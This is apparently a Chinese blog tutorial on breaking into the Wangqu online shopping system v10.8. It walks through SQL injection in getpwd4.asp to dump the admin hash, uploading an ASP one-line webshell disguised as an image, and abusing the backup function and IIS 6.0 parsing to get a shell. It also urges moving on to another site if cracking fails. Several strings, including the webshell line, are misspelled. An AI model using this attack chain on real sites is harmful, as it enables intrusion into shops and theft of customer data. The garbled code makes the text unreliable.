某天晚上危险漫步在网上转悠,发现网趣网上购物系统又一一又一一又出注入漏洞了。作为一款网上购物系统能接二连三的出现漏洞还真是让人不可思议。网趣网上购物系统出漏洞的速度好像比当年万洞之王的动网还动网。。。
网趣网上购物系统版本更新很快,随着新版本的发布新的漏洞也被人发现并公布。截至危险漫步写这篇文章的时候,网趣网上购物系统的最新版本为网趣时尚版V10.8版,别人公布的漏洞说是网趣时尚版V10.7版的,我没有找到网趣时尚版V10.7版的源代码,下载最新版的网趣网上购物系统时尚版v10.8版的源代码后发现漏洞依然存在,所以漏洞也影响最新版本的网趣网上购物系统。今天就拿最新的网趣网上购物系统时尚版v10.8版来给大家介绍这个漏洞。
一、漏洞简单分析
出现漏洞的文件是网站根目录下的getpwd4.
在获得username变量的值后没有经过过滤就带入了SQL查询,包含的文件中也没有过滤,导致注入漏洞产生。
一、漏洞利用
看过了简单的漏洞分析,为了演示漏洞的过程,我从网上下载了存在漏洞的网趣网上购物系统时尚版v10.8版的源代码,在我的虚拟机里的Windows 2003系统中用IIS 6.O把网趣网上购物系统时尚版v10.8版运行了起来。
来看漏洞方法。getpwd4.asp?userame=cnww,我们虚拟机里的完整注入地址,其中chww是网趣网上购物系统自带的用户,如果不存在了可以自己注册个。把注入地址放到pangoin里,检测出了漏洞,并且是字符型注入漏洞。
网趣网上购物系统数据库里的表名为cnww,不在panglin的表名列表中,因此需要手动添加,点“Datas”选项卡,在左侧的空白框中右键-->AdTable,添加表cnww。
然后双击表cnhw猜列名,管理员的用户名的列名为admin,管理员的密码的列名passord,点”Datas”按钮后就可以得到想要的信息了。
得到的管理员的用户名为admin,密码为7a57a5a43894aOe,密码是经过MD5加密的,能不能破解出来就看你的运气了。破解出密码为admin。有了管理员的用户名和密码就可以考虑进后台拿shell了。当然,如果密码比较复杂,你破解不出来,最好的方法就是放弃这个网站换另一个网站试试了。
网趣网上购物系统的默认后台目录为admin,访问就看到了后台登录页面,用得到的管理员的用户名和密码登录了后台。
网趣网上购物系统在后台不存在上传漏洞,不能通过上传漏洞直接获得shell,后台有数据库备份的地方,但不能自定义备份后数据库的名字,因此也不能用常规的备份数据库文件的方法获得shell。那怎样才能获得shell呢?其实网趣网上购物系统后台获得shell说简单也简单,说困难(也可以说是不能)也困难,关键要看网趣网上购物系统所在服务器的WEB服务器用的是不是IIS 6.0了,如果是就简单,不是就麻烦了。好在现在网络上运行ASP程序
的WEB服务器绝大多数都是IIS 6.O,我虚拟机里的也是IIS 6.0,正好可以做演示。把ASP-句话木马服务端代码<%eal reqest("x")%>保存到一个文本文档里,然后把文件名改为x.jpg。在网趣网上购物系统后台中点击“商品管理”中的“添加商品”,然后点击“上传小图片”把刚才生成的x.Jpg上传上去,虽然提示文件格式不对,但却上传成功了,上传上去后的文件为up file/promage/201151223154320996.jpg。
再点“数据处理”下的“数据备份”来到数据库备份的地方。可以看到备份数据库名称不能自定义,都为shop.mdb,但当前数据库路径和备份数据库目录都可以自定义。当前数据库路径写,../upfile/proimage/20115223154320996.jpg,也就是一句话木马服务端上传后的文件名,备份数据库目录写,./Databakup.asp。
点“开始备份”按钮后提示“数据库备份完成,请进行其他操作!”,说明备份成功了。备份后文件的访问地址,用lake2的eval最小马发送端连接(密码x),成功获得shell。利用的是IIS 6.0的解析漏洞。
最后再哕嗦几句,网趣网上购物系统作为一款网上购物系统,是直接关系到用户的财产安全的,安全性是很重要的一个方面,试想如果连购物的安全都不能保证谁还敢在你的网站购物,但网趣网上购物系统却时不时地爆出一个漏洞,实在不应该啊,强烈建议网趣网上购物系统的编写者多注意一些程序的安全性。
本文为网络安全技术研究记录,文中技术研究环境为本地搭建或经过目标主体授权测试研究,内容已去除关键敏感信息和代码,以防止被恶意利用。文章内提及的漏洞均已修复,在挖掘、提交相关漏洞的过程中,应严格遵守相关法律法规。